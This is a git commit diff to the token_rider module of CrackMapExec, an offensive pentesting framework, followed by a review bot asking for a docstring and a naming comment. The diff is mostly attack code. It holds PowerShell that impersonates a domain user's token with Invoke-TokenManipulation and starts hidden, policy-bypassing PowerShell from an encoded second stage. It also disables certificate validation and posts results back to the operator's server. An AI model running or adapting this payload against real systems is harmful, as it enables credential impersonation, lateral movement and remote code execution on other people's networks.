changed var names in token_rider module

byt3bl33d3r 2016-09-26 13:47:36 -06:00
parent 3d50982bfa
commit b1e8322704
1 changed files with 3 additions and 6 deletions


@ -103,12 +103,12 @@ class CMEModule:
$post_back = $post_back + $token_desc; $post_back = $post_back + $token_desc;
Send-POSTRequest $post_back Send-POSTRequest $post_back
Invoke-TokenManipulation -Username "{domain}\\{user}" -CreateProcess "cmd.exe" -ProcessArgs "/c powershell.exe -exec bypass -window hidden -noni -nop -encoded {command}"; Invoke-TokenManipulation -Username "{domain}\\{user}" -CreateProcess "cmd.exe" -ProcessArgs "/c powershell.exe -exec bypass -window hidden -noni -nop -encoded {second_stage}";
return return
}} }}
}} }}
Send-POSTRequest "User token not present on system!"'''.format(command=b64encode(second_stage.encode('UTF-16LE')), Send-POSTRequest "User token not present on system!"'''.format(second_stage=b64encode(second_stage.encode('UTF-16LE')),
server=context.server, server=context.server,
addr=context.localip, addr=context.localip,
port=context.server_port, port=context.server_port,
@ -118,9 +118,6 @@ class CMEModule:
return create_ps_command(launcher) return create_ps_command(launcher)
def payload(self, context, command): def payload(self, context, command):
command_to_execute = 'cmd.exe /c {}'.format(command)
#context.log.debug(command_to_execute)
#This will get executed in the process that was created with the impersonated token #This will get executed in the process that was created with the impersonated token
payload = ''' payload = '''
[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
@ -154,7 +151,7 @@ class CMEModule:
addr=context.localip, addr=context.localip,
port=context.server_port, port=context.server_port,
targets=self.target_computers, targets=self.target_computers,
command=command_to_execute) command=command)
return payload return payload
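Review bot: `payload` now splices `command` into the PowerShell template unchanged (the `command=command)` line in the last hunk), where the removed lines wrapped it in `cmd.exe /c` first, so the shell-wrapper and quoting contract has moved to the caller but nothing records that, and the method has no docstring. Add one directly under `def payload(self, context, command):`, e.g. `"""Return the PowerShell that runs *command* in the process created with the impersonated token; *command* is inserted verbatim into the template, so the caller supplies any shell wrapper and quoting."""`. The launcher template in the first hunk now names its placeholder `second_stage` while this template keeps `command`; a one-line comment stating that the two templates deliberately use different placeholder names would save the next reader from assuming a mismatch. The launcher's enclosing method begins outside the first hunk, so I could not check its other `format` arguments against the renamed placeholder.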